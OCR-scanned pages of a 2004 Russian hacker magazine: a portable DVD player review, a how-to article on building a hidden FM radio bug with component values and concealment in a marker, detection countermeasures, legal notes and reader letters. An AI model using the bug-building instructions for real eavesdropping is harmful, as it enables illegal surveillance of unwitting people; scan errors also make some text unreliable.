Сегодня мы выбрали A4Tech $-570 как систему с старичку Genius SW-5.1 Home Theater Deluxe, 
оптимальным соотношением цена/качество, поскольку даже по прошествии значительного 
поскольку она обладает достаточной времени эта система не теряется среди новых 
функциональностью вместе с хорошим моделей и показывает весьма достойный 
звучанием, поэтому ей присуждается награда результат. Ее мы награждаем ''Выбором 
"Лучшая покупка". Высшую же награду отдаем редакции". 
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Александр Иванов, test_lab (test_lab@gameland.ru) 


Представляем новин- 
ку для любителей эк- 
зотики, к которой еще 
относятся портатив- 
ные DVD-npourpbiBa- 
тели, - плеер Mustek 
PL408. Модель имеет 8,4" ЖК-экран 
с довольно крупными пикселями. 
Матрица вполне качественная, и при 
тестировании мы не заметили инер- 
ционности картинки даже во время 
просмотра гонок. Плеер обладает 
прогрессивной разверткой и соотно- 
шением сторон 16:9. При просмотре 
фильмов ты сам можешь выбирать 
соотношение из нескольких пози- 
ций. Возможны варианты настройки 
яркости и контрастности, что совсем 
не повредит при просмотре в темном 
помещении или в солнечный день 
на природе. Так как плеер позицио- 
нируется как портативный, есть 
функция поворота картинки Ha 180 
градусов в горизонтальной плоскос- 
ти, при закреплении на крыше сало- 
на в машине - довольно оригиналь- 
ный ход. Можешь прикрепить DVD 
на манер солнцезащитного козырь- 
ка и во время стоянки смотреть с 
друзьями кино. 

Небольшой толщины удалось дос- 
тичь благодаря компактному приводу 
и выносной аккумуляторной батарее. 
Система Anti-Shock Protection обеспе- 
чивает просмотр видео даже во вре- 
мя движения, а прикрепляемый акку- 
мулятор емкостью в 4000mAh позво- 
ляет быть независимым от розетки 
более 3 часов. Что касается стацио- 
нарного питания, то есть возмож- 
ность подключения и к обычной ро- 
зетке, и к автомобильному прикури- 
вателю - через специальный пере- 
ходник. Аккумулятор можно заря- 
жать как прикрепленным к проигры- 
вателю, так и отдельно, для чего он 
снабжен специальным входом. Для 
того чтобы ты мог смотреть фильмы 
даже в экстремальных условиях, на 
днище девайса и аккумулятора есть 
резиновые подушечки, которые не 
дадут скользить плееру по наклон- 
ным поверхностям. 

Если ты собираешься смотреть 
фильм не один, появляется возмож- 
ность выбора между встроенными 
динамиками и наушниками, для кото- 
рых есть 2 выхода. Причем громкос- 
ти динамиков хватит даже в доволь- 
но шумном месте. Очень удобен 
инфракрасный передатчик для бесп- 


роводных науш- 
ников (в комплек- 
те не поставляют- 
ся). Также ты мо- 
жешь подклю- 
чить Mustek 
PL408 к телеви- 
зору через анало- 
говый, S-video или 
коаксиальный вы- 
ход или использо- 
вать плеер для 
просмотра запи- 
сей с камеры. 
Фактически ты 
получаешь 
неболь- 


шой порта- 

тивный медиацентр, 
который только писать да показы- 
вать ТВ-трансляции не умеет. 

Mustek PL408 имеет и некоторые не- 
достатки. Практически все сфункции 
управления плеером вынесены на 
пульт, но лишь часть из них продуб- 
лирована на самом девайсе. При 
просмотре с подключенным аккуму- 
лятором Mustek PL408 никак не ин- 
формирует об уровне заряда бата- 
peu, так что приходится самому выс- 
читывать оставшееся время. При 
полной посадке батареи плеер отк- 
лючается без предупреждения. 

Нам на тестирование попала модель 
из 2-й зоны, что ограничило выбор 
фильмов для просмотра, но самопис- 
ные диски плеер читал исправно. Су- 
ществуют модификации для всех 6 
зон. Приятной неожиданностью бы- 
ла незаявленная возможность чте- 
ния DVD+/-RW дисков. Так что суще- 
ствует возможность самому записы- 
вать какие-то фильмы в дорогу. К 
сожалению, не поддерживается 
столь распространенный формат, 
как DivX, зато есть поддержка mp3. 
Управление воспроизведением му- 
зыки не очень удобно, но качество 
звука порадовало. Mustek PL408 в 
режиме просмотра позволяет пере- 


Mustek PL408 


Проигрываемые форматы дисков: 
DVD\VCD\CD\CD-r\CD-RW, picture CDSJPEG 


Дисплей: 8,4" 


Выходы: ИК-передатчик, для наушников(!) и 
ПДУ, 2xjack, A\V input\output, S-video, digital 
output(coaxial) 


Габариты: 212x158x29,8 
вес: 930 г без аккумулятора 


ходить как на видеофрагменты, так и 
пользоваться ускоренным воспроиз- 
ведением. "Перемотки" как таковой 
не существует в DVD-nneepax, но 
есть функция ускоренного в нес- 
колько раз воспроизведения, при 
этом видео распадается на прямоу- 
гольники или квадраты (зависит от 
кодирования)- этот плеер позволяет 
воспроизводить с 32-кратной ско- 
ростью. При проигрывании DVD+RW 
звук после перехода в нормальный 
режим воспроизведения отставал на 
несколько секунд, но это вполне 
можно списать на неподдерживае- 
мый формат. Все остальные диски 
читались отлично. 

В целом, Mustek PL408 - неплохое pe- 
шение для мобильных киноманов. =H 
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(т HARD] паяльник ) 


NeO1eX (NeOleX@rambler.ru, www.alexhak.narod.ru) 


ПАЯЛЬНИК 


СПЛОШНЫЕ БАГИ 


5 аг» - уж очень много значений имеет это слово. В мире компьютеров багами называют ошибки в чем-либо. Hy 
«¢ а в мире канифоли и припоя под ним скрывается нечто другое. 


x 
= 
= 
о 
- 
6 
6 
о 


if 


е буду томить тебя gon- 


гими прелюдиями на 


тему, почему багами (от 


англ. bug - жук), или 


жучками, назвали еще 
и устройства для незаметного прослу- 
шивания. Во многих радиожурналах 
довольно часто описываются схемы 
малогабаритных передатчиков. OgHa- 
ко, как правило, назвать эти устрой- 
ства миниатюрными можно только с 
большой натяжкой. Но прежде чем 
ругать чужие жуки, давай попытаемся 
понять, как они вообще работают. 


ПОРОДЫ ЖУКОВ 
Для начала я расскажу тебе о 

классификации подслушивающих 
устройств. Приводимый ниже список 
не претендует на полноту и закончен- 
ность по одной простой причине - эта 
отрасль народного хозяйства посто- 
янно пополняется новинками, причем 
темпы развития вполне могут посо- 
ревноваться с темпами развития 
компьютерных девайсов. 

@. Радиопередатчики с микросроном 

@.. С автономным питанием 

@@. С питанием от телесфонной линии 

©.0. С питанием от электросети 

Ф.О. С накоплением информации и 
с последующей передачей сжатого 
пакета 

0.0. Любое из перечисленного вы- 
ше, управляемое дистанционно 

@.O. Любое из перечисленного вы- 
ше, управляемое голосом (VOX) 

@. Электронные "уши" 

©.0. Микросроны с проводами 

©.0. Электронные стетоскопы (прос- 
лушивающие через стены) 

@.O. Узконаправленные микросроны 

©.0. Лазерные микрофоны 

©.0. Микросроны, использующие в 
качестве канала передачи освети- 
тельную сеть 

@.. Гидроакустические 

@. Устройства перехвата телесрон- 
ных сообщений 

9.0. С непосредственным включе- 
нием в телесронную линию 

9.0. Использующие ошибки в ра- 
боте телефонов 

@. Ретрансляторы 
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@. Видеосистемы записи и наблюдения 
Также сюда относится все вышепе- 
речисленное в различных комбинаци- 

ях с цифровыми навесами. 

Что касается радиомикросронов, то, 
заценивая тот или иной девайс, нуж- 
но принять во внимание следующие 
характеристики: 

и время непрерывной работы 

ш дальность действия 

ш мощность 

ш частотный диапазон 

ш габариты 

ш масса 

Лично мне довольно смешно читать 
об устройстве, претендующем на ми- 
ниатюрность, если в его описании нет 
этих характеристик. И уж вообще не 
собрать от смеха, когда приводятся 
совершенно нереальные характерис- 
тики (все вышеперечисленные пара- 
метры сильно зависят друг от друга). 
Ко второй группе это также относит- 
ся, хотя и в меньшей степени. Устрой- 
ства второй группы важней всего пра- 


вильно замаскировать. Девайсы, вхо- 
дящие в группу 31, вообще можно ус- 
тановить в порядочном удалении от 
объекта прослушки (вплоть go абоне- 
нтского комплекта ATC). Ну, а устрой- 
ства, входящие в группу 3.2, в настоя- 
щее время используются довольно 
редко и изготавливаются "под ключ" - 
конкретный объект. Ретрансляторы 
используются только в случае значи- 
тельного удаления от объекта прос- 
лушки. Они предназначены оля уве- 
личения дальности связи без увели- 
чения габаритов и мощности радио- 
закладки. Про устройства, входящие в 
последнюю группу, много рассказы- 
вать не нужно - сам понимаешь, какая 
огромная польза от ушей с глазами, 
особенно для Штирлицев ХХ! века. 


ТЕОРИЯ 

Теперь разберемся с принципом 
работы. В моей прошлой статье ты по- 
лучил некоторые понятия о радиовол- 


Если сигнал будет срормироваться на 
рабочей частоте, то передатчик будет 


работать некачественно: 


| Рис. 2. Устройство радиомикрофона с ЧМ 


Ретрансляторы используются только 
в случае значительного удаления от 
объекта прослушки. 


нах. Ну что ж, как говорится, осталось 
"закрепить и углубить". 

В общем виде радиомикрофон выг- 
лядит так, как показано на рис. 1. 

Область, закрашенная красным цве- 
том, одна из классических схем радио- 
передатчика с микрофоном. Синусои- 
дальный генератор определяет рабо- 
чую частоту передатчика. Соответ- 
ственно, меняя ее, мы меняем частоту. 
От типа смесителя зависит тип моду- 
ляции (АМ - амплитуодная, DSB - двух- 
полосный сигнал с подавленной несу- 
щей). Но даже если ты не знаком с по- 
нятием модуляции, тебе должно быть 
известно, что диапазон 88-108 МГц 
зовется ЕМ-диапазоном. Сейчас я по- 
ломаю в тебе остатки ламера... Дело в 
том, что по спецификации ГОСТ аб- 
бревиатура "ФМ" расшифровывается 
как фазовая модуляция. Ну а переда- 
ющие на этих частотах передатчики 
работают с частотной модуляцией - 
ЧМ, чему и вторит аббревиатура анг- 
лийская "FM" - Frequency Modulation. 
Вот эта путаница между "ФМ pyc- 
ской" и "ЕМ английской" и порождает 
волны ламеризма. Люди путают эле- 
ментарные понятия. Легко усвоить, 
что при частотной модуляции меняет- 
ся частота несущей, а при модуляции 
разовой - фаза сигнала на выходе. 
Положа руку на сероце, следует приз- 
нать, что практического значения это 
различие не имеет, так как все сазо- 
вые детекторы (вещь, обратная по 
действию модулятору) могут вполне 
спокойно переварить частотно-моду- 
лированный сигнал. Конечно, о высо- 
ком качестве полученного после де- 
модуляции сигнала речь никто не ве- 
дет, но все ж... Более того, при одно- 
частотной составляющей (монотон- 
ный сигнал то есть) сигнала отличить 
модуляцию ЧМ от ФМ практически не 


возможно, как технически, так и на 
слух. 

Давай взглянем на рис. 2. Так как о 
ФМ больше ничего рассказывать не 
буду, то речь дальше пойдет только о 
ЧМ (чтобы тебя вконец не запутать). 
В случае ЧМ сигнала смесителя как 
такового, в принципе, вообще нет, так 
как при этом способе модуляции ко- 
нечный сигнал образуется путем из- 
менения частоты передатчика в такт с 
речевым сигналом. Но если сигнал бу- 
дет формироваться на рабочей часто- 
те, то передатчик будет работать не- 
качественно (его сигнал будет "ry- 
лять" по диапазону в зависимости от 
погоды и направления ветра). Дабы 
снизить уход с рабочей частоты (это 
называется девиацией), придумали 
умножители частоты. Как правило, 
для кучи они еще и усилители. 

Все сказанное выше касается как 
багов, так и вполне обычных передат- 
чиков. Однако мы не рассмотрели 
еще два узла, которые характерны 
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только для Специализированных Уст- 
ройств Контроля, то есть багов. Про 
устройства записи, думаю, много гово- 
рить не надо, - достаточно сказать, 
что они необязательно могут исполь- 
зовать магнитный носитель. В блок 
устройства управления обычно вхо- 
дит декодер, который только и делает, 
что, получая (как правило дистанци- 
онно или VOX) сигнал, включает/вык- 
лючает баг. Источник питания же как 
таковой (то есть который можно было 
бы пощупать, например, аккумулятор 
или розетка осветительной сети) мо- 
жет вообще отсутствовать. Однако 
это не значит, что баг работает вооб- 
ще без питания. Просто устройства 
такого типа используют в качестве 
источника питания энергию электри- 
ческого поля, которое в виде помех 
присутствует везде, где наследила ин- 
дустриализация. Хотелось бы доба- 
вить, что такие баги, как правило, не 
имеют никакого сервиса и дальность 
действия их ограничена десятком-дру- 
гим метров. 


РУКОБЛУДИМ 

Ну вот, с теоретическим "разбо- 
ром полетов" покончено. Если я что и 
забыл, то по ходу дела добавлю. Не 
нужно иметь эвристик Касперского, 
чтобы догадаться, что под "делом" 
скрывается изготовление бага. А вот, 
кстати, и он - на рис. 3. 

Жестянщикам, не искушенным в ра- 
диотехнике, это должно напомнить 
что-то до боли знакомое. А именно 
классическую схему под названием 
"симметричный мультивибратор". 
Правда, от классики ее все-таки отли- 
чают введенные дополнительные 
компоненты. Так как у нас генератор 
работает на УльтраКоротких Волнах 
(УКВ) или на СверхВысоких Частотах 
(СВЧ) (кому как нравится), то резисто- 
рами рабочую точку и рабочую часто- 
ту уже не задать. Для этих целей их 
заменили на катушки индуктивности 
L1u L2, ну а сам генератор получил 
ник "симметричный с индуктивной 
нагрузкой". ЧМ-сигнал получается 
при разговоре в микрофон BMI. OgHa- 


| Рис. 3. Схема бага 


Wat 


4 
= 
= 
о 
| 
8 
8 
о 


ь- 
5 
c 
о 
| 
8 
6 
о 


(EN) Harp 


ко, если оставить только генератор и 
микрофон, полученное устройство, 
конечно, работать будет, но вот как... 
Для того чтобы оно работало пра- 
вильно, к генератору приделан кон- 
денсатор Cl. Он необходим gna того, 
чтобы "оседлать" слишком резвый ге- 
нератор, дабы девиация частоты на- 
ходилась в допустимых ГОСТ преде- 
лах (кстати, для отечественных ГОСТ 
девиация равна 50 КГц, для стандар- 
тов ISO - 75 КГц). Соответственно, и 
приемник должен работать в рамках 
ГОСТЛ5о0. В принципе, все современ- 
ные приемники ориентированы на ди- 
апазон 88-108 МГц (а наш баг рабо- 
тает именно в этом диапазоне), а это 
значит, что они соответствуют специ- 
фикации ISO. Удивляться не нужно, 
так как все радиостанции, работаю- 
щие в этом диапазоне, как правило, 
зарубежного производства, a на при- 
лавках магазинов лежит тот же забу- 
горный ширпотреб. Отечественным 
производителям, дабы хоть как-то вы- 
жить, просто приходится подстраи- 
ваться под эту интервенцию. Намек 
понял? Меняешь емкость конденсато- 
pa Cl Ha 0.15 мкФ - наш баг начинает 
дружить с отечественным приемни- 
ком, выполненным в соответствии с 
отечественным ГОСТ (например, при- 
емники, производимые заводом ГУП 
ПО "Октябрь" соответствуют). Для не- 
обходимого минимума деталей доста- 
точно. Тогда что делают в схеме кон- 
денсатор C2 и антенна WAI? Дело в 
том, что при отсутствии этих элемен- 
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тов радиус передачи нашего жука бу- 
дет ограничен десятком метров (как 
раз, чтобы передать на приемник, сто- 
ящий в другой комнате, да и то при ус- 
ловии что стены не из железобетона. 
А при наличии антенны радиус 
действия значительно расширяется - 
50-60 м на открытой местности (хотя 
это и от чувствительности приемника 
зависит). Конденсатор С2 служит для 
согласования с антенной. 


КОНСТРУКТИВ 
Хотя все вышеперечисленные де- 

тали показаны на сфотограсиях, поз- 
воль пару байт о конструктивном ис- 
полнении. В качестве С1 и C2 мною бы- 
ли использованы кондеры фирмы 
"TREC" емкостью ОЛ мкФ и 1 мкФ со- 
ответственно, потому как других (нап- 
ример, отечественных K10-176 Ha Te же 
емкости) в магазине не было. Транзис- 
торы могут быть любыми высокочас- 
тотными с граничной частотой не ме- 
нее 150 МГц, рабочим напряжением 
не ниже 9 В икоосрициентом Nepega- 
чи тока не менее 50. Таким условиям 
удовлетворяют транзисторы KT315, 
KT368 и транзисторы серии KT3117. Я 
мудрить не стал и применил KT315. 

Как и в прошлый раз, в качестве 
микросрона был использован МКЭ-3, a 
если его нет, то можно применить мик- 
рофоны типов MI-B2 или "Сосна" (а 
также любые другие, имеющие встро- 
енный усилитель, однако за соответ- 
ствие распайке в этом случае я не от- 
вечаю). Особого внимания заслужива- 
ют катушки индуктивности, поскольку 
OT их изготовления зависит рабочая 
частота насекомого. Они бескаркас- 
ные, намотаны на оправке диаметром 
2.5 мм (стержень от обычной шарико- 
вой ручки или хвостовик сверла). Чис- 


ло витков - 15, диаметр провода 0.3 мм, 
марка - ПЭВ. Крупным планом они да- 
ны на рис. 6. В качестве антенны ис- 
пользуется кусок провода длиной 375 
мм, что составляет 1/8 длины волны. 
Можно ли использовать провод про- 
извольной длины? Конечно же, мож- 
но, но в этом случае она будет настро- 
ена не в резонанс, а это значит, что на 
высокий радиус действия можно не 
рассчитывать. Дабы не увеличивать 
габариты жука GO смешных размеров, 
этот провод намотан на стержне от 
маркера (его длина укорочена на дли- 
ну печатной платы + длину батареек) в 
несколько слоев. Источником питания 
служат 4 батарейки "таблетки" на 2.5 
В. Между прочим, маркер использует- 
ся исправный, тем самым мы одним 
тапком убиваем двух тараканов. 

На рис. 9 и 10 показан вариант рас- 
положения компонентов на печатной 
плате и соединительных дорожек со- 
ответственно. Она была изготовлена 
специально под перманентный мар- 
кер, который в нашем случае служит 
корпусом для бага и имеет размеры. 
Изготовленный мною образец предс- 
тавлен на рис. Tl. Там же показан спо- 
соб крепления батарей питания. 

В прошлый раз я тебе рассказал о 
ручном способе изготовления печат- 
ных плат. Предлагаю вариант второй, 
"продвинутый" и "полуавтоматичес- 
кий". Для этого тебе понадобится ла- 
зерный принтер, матовая сротобумага, 
обычный утюг с терморегулятором. От- 
рубаешь режим экономии тонера и 
распечатываешь чертежи плат в 
масштабе 11. Обезжириваешь, обора- 
чиваешь заготовку чертежом, утю- 
жишь, смотришь, сколько процентов 
осталось. Повторяешь, подбирая тем- 
пературу утюга до тех пор, пока у тебя 
не станет получаться с первого раза 
(в следующий раз будет проще, ведь 
температуру ты уже знаешь). Тонер, в 
составе которого находятся полимеры 
(что-то вроде полипропилена), должен 
надежно предохранить нужные нам 
дорожки от действия химических реак- 
тивов. Кстати сказать, если бумагу 
сильно не мять и если тонер сошел 
полностью, то ее можно использовать 
еще не один раз. Остается просвер- 
лить отверстия по натравленным мет- 
кам и распаять компоненты. Проверив 
отсутствие короткого замыкания по 
цепям питания, можно подать напря- 
жение питания. Оно, кстати, в штатном 
режиме составляет 9 В, но устройство 
сохраняет работоспособность при сни- 
жении питания go 1.5-2 В. При этом, 
правда, меняется рабочая частота и 
несколько уменьшается радиус пере- 
дачи. Думаю, вид утюга тебя не прико- 
лет, поэтому его фото я не даю. 

Но одного жука для слежения за со- 
седом недостаточно - тебе необходим 
приемник. Как я говорил выше, в каче- 
стве приемника может быть использо- 
ван любой промышленный приемник 
на диапазон 88-108 МГц. Но слово 
"любой" не гарантирует максимальной 


дальности связи и уверенного приема. 
В частности, совершенно не подходят 
приемники, не имеющие системы авто- 
матической подстройки частоты (АПЧ). 
Пригодность конкретной модели при- 
емника можно узнать, посмотрев ее 
описание. И не забывай: чем больше 
чувствительность (то есть чем меньше 
MKB), тем больше зона приема. 


ПРОТИВОЯДИЕ ДЛЯ ПРОФИ 
Любое специализированное уст- 
ройство контроля имеет свой антипод. 
В нашем случае их может быть два: 
устройство постановки локальной по- 
мехи и детектор излучений. Первое 
относится к пассивной защите, второе 
- к активной. Конечно, их можно ис- 
пользовать и раздельно, но лучше в 
комплексе, ибо комплексные меры - 
самые действенные. Методика проста: 


в случае обнаружения детектором по- 
дозрительного источника радиоизлу- 
чений (но при невозможности устано- 
вить его однозначно точно либо при 
невозможности ликвидировать) ста- 
вится источник локальной помехи. В 
простейшем случае детектором ради- 
оизлучений может послужить упро- 
щенный приемник, в котором отсут- 
ствуют частотно-избирательные цепи 
(колебательный контур). В качестве 
источника локальной помехи может 
послужить тот же передатчик, у кото- 
рого вместо микрофона включен ге- 
нератор звуковой частоты (еще луч- 
ше изменяемой по случайному зако- 
ну). На диске ты найдешь схему раз- 
работанного мною такого устройства. 
Так как тема данной статьи - баги, а не 
противоядие к ним, то описания рабо- 
ты и чертежей печатных плат я не 


даю. Хотя, думаю, что нетрудно про- 
вести аналогию и догадаться самому, 
как оно работает. Там же, на диске, ты 
найдешь схему детектора радиоизлу- 
чений. Кстати, на ее авторство я не 
претендую. Даже больше: я понятие 
не имею, кто автор, так как схема уже 
лет пять гуляет по ФИДО и интернету 
ия уже видел как минимум трех "ав- 
торов", бивших себя пяткой в грудь и 
утверждавших: "это мое". 


ПРЕСТУПЛЕНИЕ И НАКАЗАНИЕ 

Думаю, не стоит давать излишних 
комментариев к УК РФ, поэтому буду 
краток: 

Статья 135. Нарушение тайны пере- 
писки, телефонных переговоров и те- 
nerpacpHbIx сообщений. Наказывается 
исправительными работами на срок 
go 6 месяцев или штрафом в размере 
1 минимальной зарплаты труда (в ре- 
дакции от 1982 году к вышеперечис- 
ленному добавлялось еще и общест- 
венное порицание :-)). 

Статья 65. Шпионаж. Срок: от 7 go 15 
лет, в особых случаях - высшая мера 
наказания, с конфискацией имущества. 

Статья 76. Передача иностранным 
организациям сведений, составляю- 
щих служебную тайну. До трех лет 
либо исправительные работы на срок 
go 2 лет. При особо тяжких обстоя- 
тельствах - до 8 лет лишения свобо- 
ды. В этой же статье прописано нака- 
зание за промышленный шпионаж - 
gO одного года заключения или 
штраф в 200 минимальных зарплат. 

Статья 205. Повреждение морского 
TenerpacpHoro кабеля. Наказывается 
исправительными работами на срок 
go 3 месяцев или штрафом в размере 
1 минимальной зарплаты труда. Пов- 
реждение кабеля в состоянии край- 
ней необходимости исключает уголов- 
ную ответственность. 

А если против тебя ведут "темные 
делишки"? 

Статья 170. Злоупотребление 
властью или служебным положением. 
От увольнения до 8 лет лишения сво- 
боды. При этом можно в качестве 
отягчающего обстоятельства можно 
подвести любое нарушение из целых 
13 статей УПК РФ (те, что касаются 
механизмов осуществления оператив- 
но-розыскной деятельности). 

Помни это, береги маму и ни в коем 
случае не трогай морской телеграф- 
ный кабель! Ну, если только совсем 


приспичит :). 
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На письма отвечал Dr. Klouniz 


(spec@real.xakep.ru) 
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FROM: ШВЕДОВ ДЕНИС НИКОЛАЕВИЧ [SHADOW1972@BK.RU] 


SUBJECT: Я ОБОЗЛИЛСЯ 


А здравствуйте. 

Купил тут "Хакер Спец" № 9. Повелся на прикольную тему "Настройка и разгон...". Ну, есть пара мудрых мыслей в текстовом формате. А ведь 
к диску ваша громкая рецензия "КУЧА софта для тюнинга твоего ПК". Ну и где же оно все? Также купил "Железо" за август месяц. Все 
замечательно, только оболочка диска ну совсем не работает. Вы что, все лето пиво квасили? Все, уйду от вас к другим издателям :(. 


ОТВЕТ: 

А привет! За мудрые мысли спасибо, признаться, у нас они просто колоннами в головах бродят, и почти все - эротичес- 
кого содержания. За «Железо» мы не отвечаем, поскольку ну совсем ни причем. А пиво - да, квасили, но и тут мы ни 
причем: было написано, что оно безалкогольное :(. Так что, Денис Николаич, не уходи от нас, не разводись и не ставь 
кактус между кроватями! Давайте, дорогие читатели, писать в форуме на forum.xakep.ru или по почте на 
spec@real.xakep.ru, ЧТО ИМЕННО вам не досталось на нашем диске, и на очередной компакт мы зажжем все, чего ваша 
душа пожелает. 


FROM: АСУС [ASUS@STARLINK.RU] 


SUBJECT: ПРИВЕТ 


Народ, хочется у вас спросить: какого XXX вы написали такую хорошую статью про сеть StarLink Telecom? На самом деле эта сеть не стоит того, 

что о ней пишут. Постоянные сбои, вечно пьяные монтажники, каждый день кражи оборудования, хамские и зажравшиеся админы, высокие тари- 
фы, очень плохая поддержка по телефону... Тут целую статью надо написать, надо выводить их на чистую воду, хочу написать статью про них, но также 
и хочу, чтобы вы опубликовали ее в своем журнале. А журнал Ваш очень классный, особенно раздел "Западлостроение". У моих соседей уже по ночам 
начинается паранойя. В общем, написать вам статью о правде StarLink Telecom? 


ОТВЕТ: 

Мы писали? Не помню такого. Разве что в номере, посвященном тому, как самому стать локальным провайдером, Андрю- 
шау них интервью брал. Они же, соответственно, и статьи ему писали, а, как говорится, сам себя не похвалишь, сидишь 
как оплеванный :). Про их глубокие личные качества знать ничего не хотим, потому что имеет значение только качество их 
статей, а в них они не пропагандировали кражу оборудования, разбой, разжигание розни и сжигание молниями хабов и се- 
тевух :). Моя статья была только «Тянем-потянем. Мануал по протяжке сети в жилом доме», и, для того чтобы ее толком от- 
редактировать и дополнить, я брал интервью у своего провайдера, который, кстати, меня полностью удовлетворяет :). А ес- 
ли они тебе так не нравятся, почему не уйдешь? Альтернатив много, и XDSL в том числе. И это... раздела «Западлострое- 
ние» у нас уже очень давно нет (в Спеце никогда и не было: был номер, посвященный этому делу - прим. AvaLANche'a). 
Выросли мы, толчки не бьем, бабушек не шугаем. Так, озоруем по мелочам, но уже об этом не пишем :). 


FROM: ИГОРЬ САЛЬНИКОВ [I_SALNIKOV@MAIL.RU] 


SUBJECT: 


Уважаемая редакция! Я зимой приобрел комп и первое время был спокоен, начал покупать ваш журнал. Но в начале лета купил ноутбук - с тех 
пор не расстаюсь. В сентябре купил первый раз ваш СПЕЦ и не могу понять, что значит «ЗАГРУЗОЧНЫЙ диск» [написано на CD). ПОМОГИТЕ ЛО- 
ХУ... скиньте справочку на мыло, заранее СПАСИБО. 


C уважением, Игорь. 


ОТВЕТ: 

А мы откуда знаем, что такое «загрузочный диск»? Это SkyWriter знает, что такое «загрузочный диск», поскольку он ре- 
дактор диска и его, стало быть, делает. Так что все вопросы к нему. Но если бы ты попробовал пихнуть его в CD-ROM, выста- 
вить в ВЮ5'е загрузку с CD и перегрузиться, может быть, к тебе бы свалилось ЗНАНИЕ :). 


ХАКЕРСПЕЦ | 11(48) | 2004 


FROM: PHEONIX@EMAIL.SU 
SUBJECT: СТАТЬЯ 


Здравствуйте! 

Хотел бы разместить у вас статью по поводу новой технологии 
на новой компьютерной площадке. 06 этой новинке еще никакой жур- 
нал в России не писал 100%, и вы будете первыми. Что мне нужно для 
начала знать: 

1) Какой тираж у журнала. 

2) Кто должен писать статью: я или вы. 

3) Конечно же, нужно следующее: ссылку на сайт, где я это зачитал, мой 
НИК, О ТОМ, ЧТО Я написал эту статью. 

4) Там должна быть фотография этого устройства. 

5) Возможно ли поместить на лицевой стороне журнала рисунок этой шту- 
киили только внутри журнала, или вообще как возможно, если это возможно, 
тоесть возможно ли вообще опубликоваться в вашем журнале с подобными 
условиями, если возможно, то скажите, с какими именно. 

Теперь, что от меня требуется, если это возможно, то есть возможно ли вооб- 
ще опубликоваться в вашем журнале с подобными условиями, если возмож- 
но, то скажите, с какими именно. Теперь чисто мое мнение, независимое ни от 
чего. Компьютер, сделанный по новой технологии, создан, видать, специально 
для программеров, то есть можно саму переписать OC и писать приложения на 
(С-подобном языке! Если я не туда написал, то сорри, скажите, куда нужно. 


ОТВЕТ: 

Никакое не сорри, потому что ты, имхо, злой спаммер 
:). История этого письма восходит к тем временам, ког- 
да мне его cpopBapgHyn БООБТ (редактор PC-ZONE 
Хакера) как редактору Кодинга. Я ничего не понял и 
спросил у Бубла, на какой сфиг мне сдалось это пись- 
мо, на что он нецензурно ответил: «A на [censored] 
мне оно?» Иначе говоря, с помойкой он мой мыльник 
перепутал :). И правда, что хочет человек, который го- 
ворит о какой-то крайне сомнительной технологии, но 
уже хочет фотку в статье, фотку на обложке и тираж 
журнала? Вообще-то, прежде чем что-то хотеть, надо: 
а) рассказать о теме статьи и обосновать ее актуаль- 
ность; 6) доказать мне, что без этой темы наш журнал 
просто не выживет. Если статья уже есть, то надо при- 
ложить ее в аттач, между прочим, в Кодинг я уже взял 
около 2 статей со стороны, и народ оказался очень 
доволен. Так что работа в журнале - это суть обычная 
работа: резюме, портфолио, все дела. А уж насчет 
вопроса, кто будет писать статью - ты или мы, это рес- 
пект. Хороший вопрос :). 


FROM: КАСУМОВ МИХАИЛ [PULSIK@INBOX.RU] 


SUBJECT: 


Привет. 

Я вот по какому вопросу. Хм, думаю, вы сможете мне 
помочь. Отсканировал я |Р'шник. Ну, допустим, 
www.megaxakepsite.ru (111.222.333.444). И нашел там 4 открытых 
порта: 21, 22, 25 и 80. Хм... Ну а дальше-то чего мне с ними делать?! 
Hy, просканировал я и получил список портов: [skipped]. 

Это небольшой его фрагмент. Весь список занимает 10 листов. А 
дальше-то чего?! Как что-то просмотреть на сервере, как вообще 
доступ-то к ресурсам получить? Будьте добры, объясните, 
пожалуйста, что к чему. Хорошо? Заранее благодарен. 


С искренним уважением, Sny. 


ОТВЕТ: 

Как - что делать? Ничего не делать. Ты теперь крутой 
взломщик, и все такое :). Отвечаю в третий раз - не 
могу в одном письме излагать толстые мануалы, тем 
более что я сам ничем таким не занимаюсь и никаких 
толстых мануалов не читаю. Вот, например, номер этот 
почитай, а заодно почитай Хакер, особенно рубрику 
ВЗЛОМ, потому что ежемесячно, ежедневно, 
ежесекундно Никита Кислицин думает в ней о тебе! И, 
как всегда, Гугл в помощь! 


FROM: MAUS [MAUS@KOLCH.ELCOM.RU] 
SUBJECT: 


Добрый день! 


Подскажите следующее: я поместил на Рабочий стол номера журна- 
лов, которые были положены вами на диск, а они в формате PDF. Я 
никак не могу их прочитать. Как мне их перекодировать? В каких 
числах обычно выходят новые номера журнала? 

Спасибо за ваш труд, всяческих успехов Bam!!! 


С уважением, Олег. 


ОТВЕТ: 

Вот это правильное письмо! Прошу заметить, писал я 
его не сам себе :). Да, мы действительно молодцы, дела- 
ем супержурнал, только вот, оказывается, непонятно из 
него, какой прогой открывать .4ос-сфайлы, как убрать со 
стола корзину и как сменить обои Рабочего стола. А так 
- крутой журнал мы делаем :). Если честно, то рубрика 
«е-мыло» в этом номере похожа на техподдержку cpopy- 
ма локалы: «где взять и чо такое фаервол и антивирус», 
«пачиму капмпьютыр сам выключается» и т.д. Предла- 
Tato писать нам больше и чаще :), можно просто призна- 
ваться нам в любви, можно конструктивно писать, что 
нравится, что не нравится и что хочется, какие темы 
Спеца ты бы хотел видеть (аргументированно), ит.д. 
Иначе говоря, предложения по журналу. Чего уж про- 
ще: «Я бы хотел Спец по мегахардкорному низкоуровне- 
му программингу, потому что все, кто пишет Ha Delphi, 
суть ламеры. Например, я хотел бы видеть там такие те- 
мы статей: (список из кучи TeM)», - или: «Мне не нравит- 
ся статья (такая-то)? потому что ее писал ламер, а ламе- 
ром он является, потому что: (список багов статьи)». А 
также: «Я очень люблю главного редактора Аваланча, 
потому что я обожаю лиловых негров-журналистов», «Я 
обожаю Dr. Klouniz, потому что я и есть Dr.Klouniz», «Я 
хочу, чтобы мне на Новый Год подарили Горла, потому 
что он такой милый, я очень огорчусь, если не найду 
Горла на диске в декабрьском номере». Ну, темы есть? 
Вперед, ваять письма :). 
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FROM: ZHULIK_@MAG.SU 


SUBJECT: 


Здравствуйте! На днях экспериментировал в BIOS: пытался разог- 

нать комп, и произошел облом! Включаю комп, и сразу раздаются 
писки из системника! Требует системную дискету, вставляю, а далее требу- 
ет файл awdflash.exe, но его нет у меня, у друга тоже искал! Даже в BIOS 
‘доступа нет! Что это за файл, где раздобыть, или я накрыл BIOS? Комп на 
